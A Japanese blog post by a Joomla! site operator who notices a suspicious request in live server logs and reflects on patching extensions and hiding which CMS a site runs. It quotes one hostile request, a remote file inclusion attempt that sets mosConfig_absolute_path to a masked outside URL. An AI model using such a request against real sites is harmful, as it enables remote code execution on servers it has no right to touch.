たまにリンクが切れているとかサイトが見られないなどとメールが来るのだが、何が原因なのか不明です。もしかするとJavascript?などと考えてみたりもするが、わかりません。リンク切れの多くは、extensions.joomla.orgのリンクを私が、更新し忘れたりするもので良いのですが原因がわからないものは少し不安ですね。
先日サーバーの生ログを少し眺めていました。5秒毎に更新されるのですが、IPアドレスやブラウザ情報、リクエストなどのログをリアルタイムで見ることができます。ボーッと見ていたのですが、一瞬眼が大きくなりました。こんなリクエストがあったのです。
/content/view/xxx/xx/?mosConfig_absolute_path=http://xxxxxx/xxxx/xxx
何をしようとされているのかわからんが、やめて欲しいものですね。
こういうのを見てしまうといかに、最新のセキュリティ情報に敏感でいなければいけないのかが、よくわかりますね。たとえば、Joomla!がアップデートされたらセキュリティ上の脆弱性も公開されているわけですから、悪意を持った人ならばその脆弱性をついた攻撃ができることになります。また、サードパーティーのエクステンション(私が配布している物も同じです。)の脆弱性が発見されたら、その更新情報をいち早く入手し更新されていなければ、自分で対策を施すのか、でなければそのエクステンションを無効にするくらいの心構えが必要なのでしょうね。これは、Joomla!に限らずすべてのものに共通することですが、自分で簡単にできることは、自分なりに対策をするべきでしょうね。
また、サイト構築がJoomla!で行われていない、もしくは何を使ってサイトが構築されているかわからなくするのも重要だと思います。Joomla!1.0.xではSEFエクステンションを使わない限りURLを見れば一目瞭然です。隠しようがありません。Joomla!1.5ならURLがJoomla!のそれとわかりづらくはなりますが、Joomla!を使っている人ならわかるかもしれません。
そうだ!他のCMSを使ってJoomla!になりすまそう
誰か、WordPressSEFとかMovableTypeSEF、XOOPSSEFみたいになりすましSEFエクステンションを作ってくれないだろうか・・・。互いのCMS開発者が作成しあったらいけるのではないだろうかなどと・・・。
